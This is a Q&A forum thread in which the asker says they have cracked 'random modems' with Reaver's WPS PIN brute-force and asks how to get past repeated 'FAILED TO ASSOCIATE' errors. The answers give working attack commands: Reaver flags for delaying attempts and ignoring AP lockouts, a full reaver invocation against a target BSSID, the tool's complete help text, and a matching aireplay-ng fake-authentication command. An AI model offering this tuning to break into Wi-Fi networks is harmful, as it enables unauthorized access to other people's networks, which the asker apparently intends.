# Reaver used to work so fluently, im getting FAILED TO ASSOCIATE.?

Tags: linux, ubuntu, wireless-networking, debian, wps

I am running debian the latest with amd64 on a dell inspiron 1564 with a Broadcom pci adapter BCM4312
part of the B43xx family.

im also running the latest version of reaver
now I know this adapter I have is not Linux-friendly, as it failed to install with the disc, it asked me for some fw file but anyways I got it to work, I can surf the web.

to my question
I have been able to crack my random modems all using wps. since I got this computer NONE.!

what happens is that it starts associating, BAM then it start trying BAM then after around 1% - 4% it will start giving FAILED TO ASSOCIATE every minute, it can do that all night

I have tried around 15 different modems and same story

is there a trick to get around this, maybe add more commands to do something that will almost guarantee success?

thanks

Answer (score 4, accepted):

Rever is a delicate beast that requires some tender loving care to work. 
Most likely what is happening, is the Access Point is reaching the maximum number of tries allotted in a time period.

You will need to slow down your attack.

If you type in `reaver -h` , you can see a list of all the available options.

You will need to experiment with these options.

try using

```
-a (auto detect beset options)  
-d (give a long delay between requests)  
-r (sleep after so many attempts)  
-vv (very verbose, will show everything that is going on. You can then google any error messages you see)  
-x (time to sleep after 10 failures)
```

My standard config. If this doesn't work, I start adding flags like -x or -r.

```
reaver -i mono0 -c 1 -b <someMacAddress> -vv -a
```

Help page

```
root@kali:/etc/apt# reaver -h

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Required Arguments:
    -i, --interface=<wlan>          Name of the monitor-mode interface to use
    -b, --bssid=<mac>               BSSID of the target AP

Optional Arguments:
    -m, --mac=<mac>                 MAC of the host system
    -e, --essid=<ssid>              ESSID of the target AP
    -c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)
    -o, --out-file=<file>           Send output to a log file [stdout]
    -s, --session=<file>            Restore a previous session file
    -C, --exec=<command>            Execute the supplied command upon successful pin recovery
    -D, --daemonize                 Daemonize reaver
    -a, --auto                      Auto detect the best advanced options for the target AP
    -f, --fixed                     Disable channel hopping
    -5, --5ghz                      Use 5GHz 802.11 channels
    -v, --verbose                   Display non-critical warnings (-vv for more)
    -q, --quiet                     Only display critical messages
    -h, --help                      Show help

Advanced Options:
    -p, --pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
    -d, --delay=<seconds>           Set the delay between pin attempts [1]
    -l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [60]
    -g, --max-attempts=<num>        Quit after num pin attempts
    -x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
    -r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
    -t, --timeout=<seconds>         Set the receive timeout period [5]
    -T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
    -A, --no-associate              Do not associate with the AP (association must be done by another application)
    -N, --no-nacks                  Do not send NACK messages when out of order packets are received
    -S, --dh-small                  Use small DH keys to improve crack speed
    -L, --ignore-locks              Ignore locked state reported by the target AP
    -E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
    -n, --nack                      Target AP always sends a NACK [Auto]
    -w, --win7                      Mimic a Windows 7 registrar [False]
```

Answer (score 2):

Just do:

```
reaver with -N option
```

Don’t do anything using `-a` option at first. Also try to associate with Aireplay.

So just do this:

```
reaver -i wlan0 -b 00:12:34:56:78 -vv -N -S -A
```

Simultaneously do:

```
aireplay-ng -1 5 -a 00:12:34:56:78 wlan0
```

If you have trouble with associating with AP don’t try Aireplay-ng with `-1 30` or bigger numbers.